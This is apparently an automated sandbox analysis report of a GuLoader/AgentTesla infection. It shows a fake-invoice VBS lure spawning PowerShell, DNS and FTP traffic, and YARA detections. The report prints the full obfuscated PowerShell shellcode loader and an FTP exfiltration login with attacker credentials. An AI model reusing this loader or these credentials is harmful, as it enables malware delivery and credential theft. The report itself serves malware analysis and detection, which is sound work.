                          Nov 28, 2022 18:48:09.026099920 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142076969 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142170906 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142232895 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142288923 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142343044 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142390013 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142390013 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142398119 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142452955 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142457962 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142508984 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142563105 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142616987 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142627001 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142672062 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142726898 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142780066 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142800093 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142800093 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.142833948 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142888069 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142940998 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.142968893 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143011093 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143070936 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143124104 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143140078 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143140078 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143140078 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143193007 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143249989 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143304110 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143306017 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143357038 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143410921 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143464088 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143517971 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143524885 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143524885 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143524885 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143524885 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.143570900 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143625021 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.143678904 CET8049816192.185.145.188192.168.11.20
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 28, 2022 18:48:07.610390902 CET5413853192.168.11.201.1.1.1
                          Nov 28, 2022 18:48:07.634459972 CET53541381.1.1.1192.168.11.20
                          Nov 28, 2022 18:48:18.758641958 CET6044753192.168.11.201.1.1.1
                          Nov 28, 2022 18:48:18.900638103 CET53604471.1.1.1192.168.11.20
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 28, 2022 18:48:07.610390902 CET192.168.11.201.1.1.10x240eStandard query (0)b3solutionscws.comA (IP address)IN (0x0001)false
                          Nov 28, 2022 18:48:18.758641958 CET192.168.11.201.1.1.10x51b4Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 28, 2022 18:48:07.634459972 CET1.1.1.1192.168.11.200x240eNo error (0)b3solutionscws.com192.185.145.188A (IP address)IN (0x0001)false
                          Nov 28, 2022 18:48:18.900638103 CET1.1.1.1192.168.11.200x51b4No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false
                          • b3solutionscws.com
                          TimestampSource PortDest PortSource IPDest IPCommands
                          Nov 28, 2022 18:48:18.973593950 CET2149819185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.
                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login
                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                          Nov 28, 2022 18:48:18.973908901 CET4981921192.168.11.20185.31.121.136USER noffice@mcmprint.net
                          Nov 28, 2022 18:48:19.006086111 CET2149819185.31.121.136192.168.11.20331 User noffice@mcmprint.net OK. Password required
                          Nov 28, 2022 18:48:19.006444931 CET4981921192.168.11.20185.31.121.136PASS 2K-0}h.[5hb)
                          Nov 28, 2022 18:48:22.121335983 CET2149819185.31.121.136192.168.11.20530 Login authentication failed
                          Nov 28, 2022 18:48:22.158265114 CET2149819185.31.121.136192.168.11.20530 Logout.

                          Click to jump to process

                          Target ID:0
                          Start time:18:46:42
                          Start date:28/11/2022
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
                          Imagebase:0x7ff688f30000
                          File size:170496 bytes
                          MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:2
                          Start time:18:46:43
                          Start date:28/11/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:CMD.EXE /c echo C:\Windows
                          Imagebase:0x7ff66adc0000
                          File size:289792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:3
                          Start time:18:46:43
                          Start date:28/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6297d0000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:5
                          Start time:18:47:03
                          Start date:28/11/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelkuITamBlpLdoChrLutBa(An`"""SegAddFriFr3af2Tr`"""No)Ga]GlpFruFobSclIriLecDo UmscatOuaNytCeiStcfo DieTjxbltMoefurkinSc FliBlnSttSi DoPmatKrVFuiImsSuiNobHelSaeAf(PeiBrnSktSt BjSsnaKutAf,PaiCynIntRo ciAPssPspKoafa,LsiSenbatsl JePRerTajSesTiiUnsTg)su;Ny[HuDSalGalTjIOlmSepAropirRetLe(Vi`"""DeuLesAfeSmrFo3Bu2An`"""pa)Sw]SkpAcuDibinlKriNrcBl TasUntBiaPotAniIncCh CoeFrxPltLoeUnrPenTo HyiTunprtMa jaGPreFotBuMSkeSpsNssBeaMagAieTi(PoiinnautSl TyGTuiChrDi,TriLanHotSt AmSSitTorDoaFa,SkibanRetin PrkBeiInpPrkRoaLalBo,AdiAnnAntGe UlFBeiRerNr)So;Kh[InDHolRilRkIGumrepfloGarIstLa(Pa`"""PekEseSkrArnSaeChlMe3An2ti`"""Ji)Ca]SapCeuCabAflReiTocUn PesCltLiaSetOciDacCh KoeAlxUntPreDerNinCi DiiFonPltFl DuVPoiSarFotHeuOgaThlFeAUnlMolSeoDicRe(TrisknSytDo SevNe1Ko,KaiBanBetNi PrvKn2Bi,HeiBanAmtMo InvSt3Bu,CoiMunMitTr Sivti4To)Tr;Bl[MaDinlDelJuISvmMepKboMirRitVi(Gr`"""DiAToDboVToAMaPMiIHa3Hv2Ho.BrDDeLKaLUn`"""Ru)Am]RgpKauTybVilDaiUncCh TosNetUnaMetUniBrcSe SeeNexEntIneDarBinQu AriStnSttOp RaRDoeTrgLiLOvopsaDadOpKHoeFryFr(SiiPhnSatIn syDZaaHocUnrImyBa,FaiUnnaltFo SpSSatHaoUnrPr,TiiHinPutBu NoONanEscfi)He;Po[noDCelHalBlIStmUnpUnoDarArtGi(Ge`"""SpgundSliMo3Sp2Pa`"""Em)Ti]AlpDiuFabTrlLiiChcGe PosKotHoaCetFliStcSe TreLsxRetAceUrrConBa FoiInnMitTr DdWAeiGedKaePrnfiPTjaSttBlhVe(StiHanTutIs TeOGabBydBauTr)St;Ra}Fj'Al;Bj`$DdTPohPawPlaRerFrtFrnvieVisDesSh3Gu=Fr[UdTPshRewKaaOnrSetPjnTreScsWosAr1Ov]Ca:Kn:frVMaiVirSetheuHoaVelStANulArlFooNocSu(So0Nu,Re1Mi0Cl4Ha8Mi5Pr7Ka6Mo,Un1Un2Fr2Br8Ce8Sm,pe6Tr4po)jo;Se`$ReNWiaCreFggLaaAntTaePu=Mi(NoGBleMntBu-ScIPatCieNemAuPDyrFooKupSleKurTrtInyKa Tv-haPBaaExtLohLi Ch'GyHFiKSuCSeUEn:Fr\InTVorMuekaeUotPsiSksIneFu\SkFAneDijStlErtCaoCalHvkBlnPoiPrnNegCheBanovsMu1Ef6Fo0Ka'Ha)Ci.TiHBaeSulViafofSotBoeHonElsSlfMoiKolLomSyeLnnResBr;Ft`$FoVToiJalKrlfeiPagPesRetAreKnsSy Ne=Tv Rl[VoSCyyKnsadtLeeAdmSk.OuCAdoUnnHevnoeFirNotSi]Ov:Ac:RaFMurZeoKmmevBBeaNysMueRe6Un4MoSSltRerStiUnnCogKl(Ga`$StNChaGeePrgAuaLotObeFa)Me;Kv[SoSGryBesMatEmeSmmFe.crRInuGrnLetRiiStmdeeIm.KaIFrnAjtFleOprcroBepPrSGaeGrrSnvIniGncOveHosFa.HaMInaVerGosFrhAnaAllBl]Fr:El:WaCVaoVapCoyir(Un`$HiVTriSilSwlShiSagCosartFreSlsCa,Br ca0Gs,Ru Be Cr`$HeTRehBewBiaWorFltUnnOveUnsHysVa3Ug,By Zy`$BiVSpiSalGrlKoiSvgKrsLitUdeDrsAd.HecMioPouAjnCttHa)Ov;Me[HyTBuhPrwFyausrAntBenMaeMospasHo1In]Je:Sa:HoEtrnBiuPimFrSBrycesditBeeKamUdLAeoDrcKoaGelOpeLesGeWVi(Bo`$feTSahSkwJoaEnrCitPrnPeeSasTossi3Bi,be Kr0De)rh#Te;""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;;
                          Imagebase:0x720000
                          File size:433152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2688111783.0000000009190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate

                          Target ID:6
                          Start time:18:47:03
                          Start date:28/11/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6297d0000
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:9
                          Start time:18:47:34
                          Start date:28/11/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
                          Imagebase:0xdf0000
                          File size:2141552 bytes
                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:moderate

                          Target ID:10
                          Start time:18:47:34
                          Start date:28/11/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB964.tmp" "c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP"
                          Imagebase:0x430000
                          File size:46832 bytes
                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:11
                          Start time:18:47:54
                          Start date:28/11/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                          Imagebase:0x670000
                          File size:106496 bytes
                          MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.2410724852.0000000000B00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                          No disassembly